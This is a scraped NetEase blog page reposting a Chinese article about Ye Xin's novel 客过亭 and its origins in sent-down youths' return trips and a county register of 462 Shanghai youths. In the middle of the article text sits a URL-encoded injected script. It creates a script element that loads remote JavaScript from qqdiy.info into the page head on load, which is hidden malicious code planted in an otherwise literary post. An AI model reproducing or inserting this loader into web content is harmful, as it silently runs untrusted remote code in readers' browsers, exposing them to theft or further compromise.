注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

dawei19500904的博客

几分怀旧,几分闲趣,几分思想。

 
 
 

日志

 
 

叶辛的《客过亭》是一本人生之书  

2011-03-01 09:15:17|  分类: 转载 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

  著名作家叶辛最新完成的长篇小说 《客过亭》近日由作家出版社出版,这是叶辛关于知识青年题材的第十本书。叶辛在接受采访时强调:“这不仅仅是一本知识青年题材的长篇小说,而是一本人生之书。 ”

  在长篇小说《客过亭》中,叶辛通过一群知青伙伴们的一次重返插队时的第二故乡之旅,以沉静平和的心态与宽广的胸怀,思索了整整一代人的信仰和爱,追索了他们过失的往事和错误,回忆了他们有过的希冀和欲望,透过他们色彩斑斓的命运和各自背上的心灵重负,写出了逝去年代的至诚至愚、至真至悲,也写出了逝去年代里生命轨迹中的尴尬和无奈,更写出了这一代人的生活现状及对人生、命运、爱情、历史、社会的诘问。经历了一番洗礼般的轮回,当他们重逢于目睹了无数历史风云变幻的客过亭上时,他们在殊途同归的人生之路上,终于明白“再绚烂辉煌的东西都会输给无情的时间”,从而各自寻找到了生命的真谛。

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<  知青岁月是一代人的阵痛,也是共和国历史上的一段阵痛,这一代人目前大多已进入回首与反思的年龄阶段,很多老知青都在组织返乡活动,含着热泪、怀着复杂的心情回忆那些日子。作为知青文学最杰出的代表人物,叶辛始终关注这一代人的生存境遇。2007年的盛夏时节,叶辛的妹妹给他打来一个电话,说她和当年在同一个县插队落户的老知青约好,要回山乡去走一走、看一看。半个月后,妹妹回到了上海,和叶辛讲起这次第二故乡之旅的感受,还带回了一本 “修文县上海上山下乡知识青年名册”。名册中,上海远赴修文山乡插队落户的462个知青的简况,均标注得清清楚楚。尤其是如今几乎不被人注意的 “家庭出身”这一半寸宽的小框里,有工人、职员、小业主、资产阶级、干部、反革命,还有富农、地主、摊贩、工商地主、坏分子、旧军人、历史反革命、自由职业者、个体劳动者、兵痞、伪警察、店员、伪职,也有至今看着都是模糊的私方、劳动者、四类分子等等,活脱是一幅上海社会的百景图。 “最让我激动不已的,是名册最后面的那个标注着‘备注’的小框,不知是知青办哪一位有心人,把所有462个上海知青离开农村以后的去向,都标出来了。原来,462个人的命运,竟有如此大的天壤之别。 ”

  无数的往事叠印在一起,让叶辛感慨万千。 “我陡地感觉到,就用一群知青们重返第二故乡的旅程,来写一部新的长篇小说,不是一件十分有意味的事情嘛! ”叶辛说,依照他的写作习惯,当构思几近完成以后,都要让它冷却一阵,沉静一段时间,他将此称作 “等待”开头,也可以称为期待一次冲动。去年4 月3日晚,当叶辛走进了一位生病的重庆知青陈俊的家中,聆听这位“一段埋藏了31年的纯真爱情”的男主人公讲述他和傣族女子依香娜的爱情故事后,一下子找到了自己一直期待着的小说开头。回到上海以后,叶辛捡拾起已有两年多的构思,起笔写作了这一部新的小说。按照起初的设想,从从容容地,每天写个三千字,花几个月时间把它写完。哪知仅仅坚持了两天,从第三天开始,每天的写作量就急剧上升,只花了两个月时间,他就把小说写完了。叶辛真诚地希望:“读者朋友们也能像喜欢《蹉跎岁月》《孽债》等作品一样,喜欢我的这一本新书。 ”

  评论这张
 
阅读(106)| 评论(6)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017